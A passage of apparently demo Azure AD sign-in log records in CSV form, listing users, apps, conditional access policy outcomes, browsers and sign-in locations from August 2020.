'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbffb959-9fbe-4abe-95ed-0d8518481300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,cbffb959-9fbe-4abe-95ed-0d8518481300,SigninLogs,Sucess,33.7984581,-84.38828278
+2099,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2340e547-da35-4a99-b70d-d2dc9a432b03,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6382c33b-18b0-46b9-982e-4aa9aae11000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa9aae11000,SigninLogs,Sucess,41.90428925,-85.99833679
+2100,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5850e971-4ea5-4b00-974e-ded1b1e15ecb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",875c831a-2c9c-4e0a-b7c7-b8309f791200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,875c831a-2c9c-4e0a-b7c7-b8309f791200,SigninLogs,Sucess,33.7984581,-84.38828278
+2101,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:25.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dac8469f-500d-0000-5683-4014141c6386,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e0e391300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,03932e54-fdb0-4c07-8405-8b9e0e391300,SigninLogs,Sucess,33.7984581,-84.38828278
+2102,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:41.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ecc3f38-f01f-4f28-894e-67c85735fc5e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9eab3b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,03932e54-fdb0-4c07-8405-8b9eab3b1300,SigninLogs,Sucess,33.7984581,-84.38828278
+2103,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6b822dcf-a353-4168-abd4-f166346d4900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6b822dcf-a353-4168-abd4-f166346d4900,SigninLogs,Sucess,35.01296997,-80.93171692
+2104,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:23.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,56c49178-9a3a-4b23-8842-1acc3d1dca89,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",aa9828f4-3e2d-42fa-acbc-edb928a51400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,aa9828f4-3e2d-42fa-acbc-edb928a51400,SigninLogs,Sucess,41.90428925,-85.99833679
+2105,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,86ab6a28-c18d-4389-aeee-c4140c3ecdc8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a90d7024-2f24-4b85-b726-7a305ada1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a90d7024-2f24-4b85-b726-7a305ada1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2106,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:06.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,98fbfa43-8641-4fd3-968c-45e4a5e72908,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 